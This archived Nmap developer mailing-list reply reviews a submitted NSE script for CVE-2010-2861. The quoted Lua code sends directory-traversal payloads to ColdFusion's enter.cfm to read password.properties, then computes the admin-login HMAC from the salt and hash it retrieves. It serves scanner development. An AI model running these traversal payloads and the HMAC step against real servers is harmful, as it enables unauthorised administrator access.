Nmap Development mailing list archives

Re: NSE: http-vuln-cve2010-2861 submission for review


From: Djalal Harouni <tixxdz () opendz org>
Date: Fri, 17 Feb 2012 12:22:49 +0100

Hi Micah,

Thanks for the re-submission, and I've some notes:

On Thu, Feb 16, 2012 at 09:59:56PM -0500, Micah wrote:
[...]
-- If a page has both the salt and the password in it then the exploit has
been successful
if ( saltcontent and hashcontent ) then
 vuln.state = vulns.STATE.VULN
If it's vulnerable and exploitable you can make:
   vuln.state = vulns.STATE.EXPLOIT

-- Generate HMAC as this is what the web application needs for
authentication as admin
 local hmaccontent = stdnse.tohex(openssl.hmac('sha1', saltcontent,
hashcontent))
    return true, string.format("\n\tHMAC: %s\n\tSalt: %s\n\tHash: %s",
hmaccontent, saltcontent, hashcontent)
 end
end
return false, "Not vulnerable"
 end
Even if it's not vulnerable, just return with:
  return vuln_report:make_output(vuln)

This will make sure that non vulnerable issues are also counted.

local exploits = {
['CFusionMX'] =
'..\\..\\..\\..\\..\\..\\..\\..\\CFusionMX\\lib\\password.properties\%00en',
 ['CFusionMX7'] =
 '..\\..\\..\\..\\..\\..\\..\\..\\CFusionMX7\\lib\\password.properties\%00en',
['ColdFusion8'] =
'..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion8\\lib\\password.properties\%00en',
 ['JRun4\\servers'] =
'..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\JRun4\\servers\\cfusion\\cfusion-ear\\cfusion-war\\WEB-INF\\cfusion\\lib\\password.properties\%00en',
 }

local results = tab.new(2)
for prod, exploit in pairs(exploits) do
 local status, result =
grabAndGrep('/CFIDE/administrator/enter.cfm?locale=' .. exploit)
if ( status or ( not(status) and nmap.verbosity() > 1 ) ) then
 tab.addrow(results, prod, result)
end
end
 vuln.extra_info="\n" .. tab.dump(results)
For the extra info no need to use tab, just use a classic table:
   vuln.extra_info=table_results

BTW these can be put in the: vuln.exploit_results table.

Thanks.

-- 
tixxdz
http://opendz.org
_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/


Current thread: